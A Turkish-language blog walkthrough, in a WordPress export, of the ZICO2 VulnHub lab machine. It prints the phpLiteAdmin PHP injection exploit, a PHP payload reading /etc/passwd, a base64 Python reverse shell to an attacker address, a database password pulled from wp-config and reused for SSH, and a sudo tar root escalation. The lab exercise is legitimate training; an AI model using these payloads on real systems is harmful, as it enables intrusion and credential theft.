{"id":1184,"date":"2021-06-17T00:56:47","date_gmt":"2021-06-17T00:56:47","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1184"},"modified":"2021-06-17T01:00:50","modified_gmt":"2021-06-17T01:00:50","slug":"zico2-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/06\/17\/zico2-1\/","title":{"rendered":"ZICO2: 1"},"content":{"rendered":"

Makine Hakk\u0131nda Bilgiler<\/h2>\n

A\u00e7\u0131klama:<\/strong>
\nDoesn't work with VMware. Virtualbox only.<\/p>\n

Vulnhub Sayfas\u0131:<\/strong>
\nhttps:\/\/www.vulnhub.com\/entry\/zico2-1,210\/<\/a><\/p>\n

\u0130ndirme Sayfas\u0131:<\/strong> https:\/\/download.vulnhub.com\/zico\/zico2.ova<\/a><\/p>\n

Walkthrough<\/h2>\n

Makinenin ip adresini tespit edelim.<\/p>\n

\u250c\u2500\u2500(root💀kali)-[\/home\/kali]\n\u2514\u2500# ifconfig eth0                           \neth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500\n        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255\n        inet6 fe80::a00:27ff:fea6:1f86  prefixlen 64  scopeid 0x20<link>\n        ether 08:00:27:a6:1f:86  txqueuelen 1000  (Ethernet)\n        RX packets 11  bytes 4438 (4.3 KiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 11  bytes 1142 (1.1 KiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\n\u250c\u2500\u2500(root💀kali)-[\/home\/kali]\n\u2514\u2500# arp-scan -l                         \nInterface: eth0, type: EN10MB, MAC: 08:00:27:a6:1f:86, IPv4: 10.0.2.15\nStarting arp-scan 1.9.7 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n10.0.2.1    52:54:00:12:35:00   QEMU\n10.0.2.2    52:54:00:12:35:00   QEMU\n10.0.2.3    08:00:27:1f:e3:ff   PCS Systemtechnik GmbH\n10.0.2.6    08:00:27:81:10:28   PCS Systemtechnik GmbH\n\n4 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.9.7: 256 hosts scanned in 2.765 seconds (92.59 hosts\/sec). 4 responded\n<\/code><\/pre>\n
nmap taramas\u0131 ile devam edelim.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[\/home\/kali]\n\u2514\u2500# nmap -p- -A -T4 10.0.2.6\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-06-16 18:45 EDT\nNmap scan report for 10.0.2.6\nHost is up (0.00085s latency).\nNot shown: 65531 closed ports\nPORT      STATE SERVICE VERSION\n22\/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)\n|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)\n|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)\n80\/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))\n|_http-server-header: Apache\/2.2.22 (Ubuntu)\n|_http-title: Zico's Shop\n111\/tcp   open  rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100024  1          32890\/udp6  status\n|   100024  1          44197\/tcp   status\n|   100024  1          51071\/udp   status\n|_  100024  1          56680\/tcp6  status\n44197\/tcp open  status  1 (RPC #100024)\nMAC Address: 08:00:27:81:10:28 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 2.6.X|3.X\nOS CPE: cpe:\/o:linux:linux_kernel:2.6 cpe:\/o:linux:linux_kernel:3\nOS details: Linux 2.6.32 - 3.5\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.85 ms 10.0.2.6\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 25.99 seconds\n<\/code><\/pre>\n
    \n
  1. portu severiz. nikto ve dirb ile devam edelim.<\/li>\n<\/ol>\n
    \u250c\u2500\u2500(root💀kali)-[\/home\/kali\/Desktop\/lfi-project]\n\u2514\u2500# dirb http:\/\/10.0.2.6\/ \n\n-----------------\nDIRB v2.22    \nBy The Dark Raver\n-----------------\n\nSTART_TIME: Wed Jun 16 19:26:57 2021\nURL_BASE: http:\/\/10.0.2.6\/\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\n\n-----------------\n\nGENERATED WORDS: 4612                                                          \n\n---- Scanning URL: http:\/\/10.0.2.6\/ ----\n+ http:\/\/10.0.2.6\/cgi-bin\/ (CODE:403|SIZE:284)                                                                                                               \n==> DIRECTORY: http:\/\/10.0.2.6\/css\/                                                                                                                          \n==> DIRECTORY: http:\/\/10.0.2.6\/dbadmin\/                                                                                                                      \n==> DIRECTORY: http:\/\/10.0.2.6\/img\/                                                                                                                          \n+ http:\/\/10.0.2.6\/index (CODE:200|SIZE:7970)                                                                                                                 \n+ http:\/\/10.0.2.6\/index.html (CODE:200|SIZE:7970)                                                                                                            \n==> DIRECTORY: http:\/\/10.0.2.6\/js\/                                                                                                                           \n+ http:\/\/10.0.2.6\/LICENSE (CODE:200|SIZE:1094)                                                                                                               \n+ http:\/\/10.0.2.6\/package (CODE:200|SIZE:789)                                                                                                                \n+ http:\/\/10.0.2.6\/server-status (CODE:403|SIZE:289)                                                                                                          \n+ http:\/\/10.0.2.6\/tools (CODE:200|SIZE:8355)                                                                                                                 \n==> DIRECTORY: http:\/\/10.0.2.6\/vendor\/                                                                                                                       \n+ http:\/\/10.0.2.6\/view (CODE:200|SIZE:0) <\/code><\/pre>\n
    http:\/\/10.0.2.6\/dbadmin\/<\/a> adresi dikkat \u00e7ekici. Bu y\u00fczden taray\u0131c\u0131 \u00fczerinden incelemeye ba\u015flad\u0131m.
    \n    http:\/\/10.0.2.6\/view.php?page<\/a>=<\/strong> adresi dikkatimi \u00e7ekti ve lfi olabilece\u011fini d\u00fc\u015f\u00fcnd\u00fcm. Bunun \u00fczerine yazmaya hala devam etti\u011fim ancak sadece makine \u00e7\u00f6zerken u\u011fra\u015ft\u0131\u011f\u0131m github projemi <\/a>kulland\u0131m.<\/p>\n
    \u250c\u2500\u2500(root💀kali)-[\/home\/kali\/Desktop\/lfi-project]\n\u2514\u2500# python3 lfi-project.py                                                                                                                              130 \u2a2f\n[*] Proje \u00e7al\u0131\u015f\u0131rken bir proxy sunucusu kullan\u0131lmas\u0131 tavsiye edilmektedir. Burp gibi bir ara\u00e7 kullanabilirsiniz. Default ayarlamalar\u0131 de\u011fi\u015ftirmek i\u00e7in kodlar\u0131 okuyunuz. E\u011fer ayarlamalar\u0131n\u0131 haz\u0131r de\u011filse 'q' ile \u00e7\u0131k\u0131\u015f yapabilirsiniz.\n[*] Hedef URL'i giriniz:\nhttp:\/\/10.0.2.6\/view.php?page=\nL\u00fctfen LFI t\u00fcr\u00fcn\u00fc se\u00e7iniz:\n1- Default\n2- Filter\n1\n[*] Terminalde kayan anlams\u0131z yaz\u0131lar ister misiniz?(e\/h)h\n[*] L\u00fctfen ka\u00e7 kere ..\/ uygulanmas\u0131n\u0131 istedi\u011fini belirtiniz. (\u00d6rn: 8)4\n<\/code><\/pre>\n
    Projenin kaynak kodlar\u0131na bakt\u0131\u011f\u0131n\u0131zda proxy kullan\u0131lmaktad\u0131r. Burp ile \u00e7\u0131kt\u0131lara bakt\u0131\u011f\u0131m\u0131zda lfi oldu\u011funu anlayabiliriz. Ancak buradan RCE yapamad\u0131m. \u0130leride burdan belki yararlanabilirim diye d\u00fc\u015f\u00fcnd\u00fcm ve bir kenara not ald\u0131m.<\/p>\n
    Sayfa \u00fczerinde incelemelerime devam ederken admin<\/strong> \u015fifresi ile http:\/\/10.0.2.6\/dbadmin\/test_db.php<\/a>?<\/strong> adresine giri\u015f yapt\u0131m. Proje ile ilgili exploit ararken a\u015fa\u011f\u0131daki sonu\u00e7lar\u0131 buldum.<\/p>\n
    \n\u250c\u2500\u2500(root💀kali)-[\/home\/kali\/Desktop\/lfi-project]\n\u2514\u2500# searchsploit phpLiteAdmin  \n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                              |  Path\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nphpLiteAdmin - 'table' SQL Injection                                                                                        | php\/webapps\/38228.txt\nphpLiteAdmin 1.1 - Multiple Vulnerabilities                                                                                 | php\/webapps\/37515.txt\nPHPLiteAdmin 1.9.3 - Remote PHP Code Injection                                                                              | php\/webapps\/24044.txt\nphpLiteAdmin 1.9.6 - Multiple Vulnerabilities                                                                               | php\/webapps\/39714.txt\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root💀kali)-[\/home\/kali\/Desktop\/lfi-project]\n\u2514\u2500# cd ..     \n\n\u250c\u2500\u2500(root💀kali)-[\/home\/kali\/Desktop]\n\u2514\u2500# locate php\/webapps\/24044.txt\n\/usr\/share\/exploitdb\/exploits\/php\/webapps\/24044.txt\n\n\u250c\u2500\u2500(root💀kali)-[\/home\/kali\/Desktop]\n\u2514\u2500# cat \/usr\/share\/exploitdb\/exploits\/php\/webapps\/24044.txt\n# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability\n# Google Dork: inurl:phpliteadmin.php (Default PW: admin)\n# Date: 01\/10\/2013\n# Exploit Author: L@usch - http:\/\/la.usch.io - http:\/\/la.usch.io\/files\/exploits\/phpliteadmin-1.9.3.txt\n# Vendor Homepage: http:\/\/code.google.com\/p\/phpliteadmin\/\n# Vendor Status: Informed\n# Software Link: http:\/\/phpliteadmin.googlecode.com\/files\/phpliteadmin_v1-9-3.zip\n# Version: 1.9.3\n# Tested on: Windows and Linux\n\nDescription:\n\nphpliteadmin.php#1784: 'Creating a New Database' => \nphpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',\n\nAn Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.\n\nProof of Concept:\n\n1. We create a db named "hack.php".\n(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database \/ existing database to "hack.php".)\nThe script will store the sqlite database in the same directory as phpliteadmin.php.\nPreview: http:\/\/goo.gl\/B5n9O\nHex preview: http:\/\/goo.gl\/lJ5iQ\n\n2. Now create a new table in this database and insert a text field with the default value:\n<?php phpinfo()?>\nHex preview: http:\/\/goo.gl\/v7USQ\n\n3. Now we run hack.php\n\nDone!\n\nProof: http:\/\/goo.gl\/ZqPVL     \n<\/code><\/pre>\n
    S\u0131ras\u0131yla buradaki ad\u0131mlar\u0131 uygulad\u0131m. \u0130lk olarak <?php system("which nc; cat \/etc\/passwd; which python;"); ?><\/strong> payload\u0131n\u0131 kulland\u0131\u011f\u0131mda http:\/\/10.0.2.6\/view.php?page=..\/..\/..\/..\/usr\/databases\/hack.php<\/a><\/strong> adresinde <\/p>\n
    SQLite format 3\u0004\u0001\u0001@ \u001d\u0002\u0016\u0001\u0001\u001d-\u00e2! \u0001\u0003\u20ac\u0003\u20ac~\u0001\u0007\u0017\u0015\u0015\u0001\u0081_tabletesttest\u0002CREATE TABLE 'test' ('cmd' TEXT default '\/bin\/nc root:x:0:0:root:\/root:\/bin\/bash daemon:x:1:1:daemon:\/usr\/sbin:\/bin\/sh bin:x:2:2:bin:\/bin:\/bin\/sh sys:x:3:3:sys:\/dev:\/bin\/sh sync:x:4:65534:sync:\/bin:\/bin\/sync games:x:5:60:games:\/usr\/games:\/bin\/sh man:x:6:12:man:\/var\/cache\/man:\/bin\/sh lp:x:7:7:lp:\/var\/spool\/lpd:\/bin\/sh mail:x:8:8:mail:\/var\/mail:\/bin\/sh news:x:9:9:news:\/var\/spool\/news:\/bin\/sh uucp:x:10:10:uucp:\/var\/spool\/uucp:\/bin\/sh proxy:x:13:13:proxy:\/bin:\/bin\/sh www-data:x:33:33:www-data:\/var\/www:\/bin\/sh backup:x:34:34:backup:\/var\/backups:\/bin\/sh list:x:38:38:Mailing List Manager:\/var\/list:\/bin\/sh irc:x:39:39:ircd:\/var\/run\/ircd:\/bin\/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/bin\/sh nobody:x:65534:65534:nobody:\/nonexistent:\/bin\/sh libuuid:x:100:101::\/var\/lib\/libuuid:\/bin\/sh syslog:x:101:103::\/home\/syslog:\/bin\/false messagebus:x:102:105::\/var\/run\/dbus:\/bin\/false ntp:x:103:108::\/home\/ntp:\/bin\/false sshd:x:104:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin vboxadd:x:999:1::\/var\/run\/vboxadd:\/bin\/false statd:x:105:65534::\/var\/lib\/nfs:\/bin\/false mysql:x:106:112:MySQL Server,,,:\/nonexistent:\/bin\/false zico:x:1000:1000:,,,:\/home\/zico:\/bin\/bash \/usr\/bin\/python ")') \u0004\n<\/code><\/pre>\n
    sonucunu ald\u0131m. G\u00fczel php kodlar\u0131 ve linux komutlar\u0131 \u00e7al\u0131\u015ft\u0131rabiliyoruz. Ayr\u0131ca g\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere \/usr\/bin\/python<\/strong> yani sistemde python'\u0131nda y\u00fckl\u00fc oldu\u011funu g\u00f6r\u00fcyoruz. Bunun \u00fczerine base64 aracl\u0131\u011f\u0131 ile bir python reverse ayarlamaya karar verdim. searchexploit<\/strong>'de buldu\u011fum dok\u00fcman arac\u0131l\u0131\u011f\u0131 ile bu sefer a\u015fa\u011f\u0131daki payload kulland\u0131m.<\/p>\n
    \n<?php system(base64_decode("cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMC4yLjE1IiwxODIyKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiL2Jpbi9iYXNoIikn")); ?>\n<\/code><\/pre>\n
    Yukar\u0131daki kodun a\u00e7\u0131klamas\u0131 k\u0131saca:<\/p>\n
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.15",1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("\/bin\/bash")'<\/code><\/pre>\n
    Bu esnada tabiki de 1822 de bir dinleme noktas\u0131 ba\u015flatt\u0131m ve reverse shell alabildim.<\/p>\n
    \u250c\u2500\u2500(root💀kali)-[\/home\/kali\/Desktop]\n\u2514\u2500# nc -lvp 1822            \nlistening on [any] 1822 ...\n10.0.2.6: inverse host lookup failed: Unknown host\nconnect to [10.0.2.15] from (UNKNOWN) [10.0.2.6] 58813\nwww-data@zico:\/var\/www$ ls\nls\nLICENSE    css      gulpfile.js  index.html  less      tools.html  view.php\nREADME.md  dbadmin  img      js      package.json  vendor\n<\/code><\/pre>\n
    \u0130\u00e7eride incelemeler yapt\u0131ktan sonra wordpress config dosyas\u0131 buldum ve oradaki kullan\u0131c\u0131 bilgilerini ssh i\u00e7in denedim.<\/p>\n
    www-data@zico:\/tmp$ cd \/home\ncd \/home\nwww-data@zico:\/home$ ls\nls\nzico\nwww-data@zico:\/home$ cd zico\ncd zico\nwww-data@zico:\/home\/zico$ ls\nls\nbootstrap.zip                to_do.txt      zico-history.tar.gz\njoomla                   wordpress\nstartbootstrap-business-casual-gh-pages  wordpress-4.8.zip\nwww-data@zico:\/home\/zico$ cat to_do*\ncat to_do*\n\ntry list:\n- joomla\n- bootstrap (+phpliteadmin)\n- wordpress\n\nwww-data@zico:\/home\/zico$ cd wordpress\ncd wordpress\nwww-data@zico:\/home\/zico\/wordpress$ ls\nls\nindex.php    wp-blog-header.php    wp-includes    wp-settings.php\nlicense.txt  wp-comments-post.php  wp-links-opml.php  wp-signup.php\nreadme.html  wp-config.php         wp-load.php    wp-trackback.php\nwp-activate.php  wp-content        wp-login.php   xmlrpc.php\nwp-admin     wp-cron.php           wp-mail.php\n\nwww-data@zico:\/home\/zico\/wordpress$ head wp-config.php -n 40\nhead wp-config.php -n 40\n<?php\n\/**\n * The base configuration for WordPress\n *\n * The wp-config.php creation script uses this file during the\n * installation. You don't have to use the web site, you can\n * copy this file to "wp-config.php" and fill in the values.\n *\n * This file contains the following configurations:\n *\n * * MySQL settings\n * * Secret keys\n * * Database table prefix\n * * ABSPATH\n *\n * @link https:\/\/codex.wordpress.org\/Editing_wp-config.php\n *\n * @package WordPress\n *\/\n\n\/\/ ** MySQL settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine('DB_NAME', 'zico');\n\n\/** MySQL database username *\/\ndefine('DB_USER', 'zico');\n\n\/** MySQL database password *\/\ndefine('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');\n\n\/** MySQL hostname *\/\ndefine('DB_HOST', 'zico');\n\n\/** Database Charset to use in creating database tables. *\/\ndefine('DB_CHARSET', 'utf8');\n\n\/** The Database Collate type. Don't change this if in doubt. *\/\ndefine('DB_COLLATE', '');\n\n\/**#@+\nwww-data@zico:\/home\/zico\/wordpress$<\/code><\/pre>\n
    \u250c\u2500\u2500(root💀kali)-[\/home\/kali\/Desktop]\n\u2514\u2500# ssh zico@10.0.2.6               \nThe authenticity of host '10.0.2.6 (10.0.2.6)' can't be established.\nECDSA key fingerprint is SHA256:+zgKqxyYlTBxVO0xtTVGBokreS9Zr71wQGvnG\/k2igw.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '10.0.2.6' (ECDSA) to the list of known hosts.\nzico@10.0.2.6's password: \n\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\nzico@zico:~$ whoami\nzico\n<\/code><\/pre>\n
    \u0130\u00e7eride incelemeler yaparken a\u015fa\u011f\u0131daki sonucu buldum.<\/p>\n
    zico@zico:~$ sudo -l\nMatching Defaults entries for zico on this host:\n    env_reset, exempt_group=admin, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser zico may run the following commands on this host:\n    (root) NOPASSWD: \/bin\/tar\n    (root) NOPASSWD: \/usr\/bin\/zip<\/code><\/pre>\n
    Bunun \u00fczerine \/bin\/tar<\/strong> ile nas\u0131l root olabilirim diye internet \u00fczerinden ara\u015ft\u0131rmalar yapmaya ba\u015flad\u0131m ve bu adresi<\/a> buldum. K\u0131saca a\u015fa\u011f\u0131daki komutlar arac\u0131l\u0131\u011f\u0131 ile root olabiliriz.<\/p>\n
    Shell\nIt can be used to break out from restricted environments by spawning an interactive system shell.\n\ntar -cf \/dev\/null \/dev\/null --checkpoint=1 --checkpoint-action=exec=\/bin\/sh\nThis only works for GNU tar.\n\ntar xf \/dev\/null -I '\/bin\/sh -c "sh <&2 1>&2"'\nThis only works for GNU tar. It can be useful when only a limited command argument injection is available.\n\nTF=$(mktemp)\necho '\/bin\/sh 0<&1' > "$TF"\ntar cf "$TF.tar" "$TF"\ntar xf "$TF.tar" --to-command sh\nrm "$TF"*<\/code><\/pre>\n
    Hadi deneyelim!<\/p>\n
    \nzico@zico:~$ sudo \/bin\/tar -cf \/dev\/null \/dev\/null --checkpoint=1 --checkpoint-action=exec=\/bin\/sh\n\/bin\/tar: Removing leading `\/' from member names\n# whoami\nroot\n# cd \/root\n# ls\nflag.txt\n# cat flag.txt\n#\n#\n#\n# ROOOOT!\n# You did it! Congratz!\n# \n# Hope you enjoyed! \n# \n# \n#\n#\n\n# \n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
    Makine Hakk\u0131nda Bilgiler A\u00e7\u0131klama: Doesn’t work with VMware. Virtualbox only. Vulnhub Sayfas\u0131: https:\/\/www.vulnhub.com\/entry\/zico2-1,210\/ \u0130ndirme Sayfas\u0131: https:\/\/download.vulnhub.com\/zico\/zico2.ova Walkthrough Makinenin ip adresini tespit edelim. \u250c\u2500\u2500(root💀kali)-[\/home\/kali] \u2514\u2500# ifconfig…<\/p>\n
    Devam\u0131n\u0131 okuZICO2: 1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[516,517],"class_list":["post-1184","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-tar","tag-zip","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1184","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1184"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1184\/revisions"}],"predecessor-version":[{"id":1187,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1184\/revisions\/1187"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1184"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1184"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1184"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}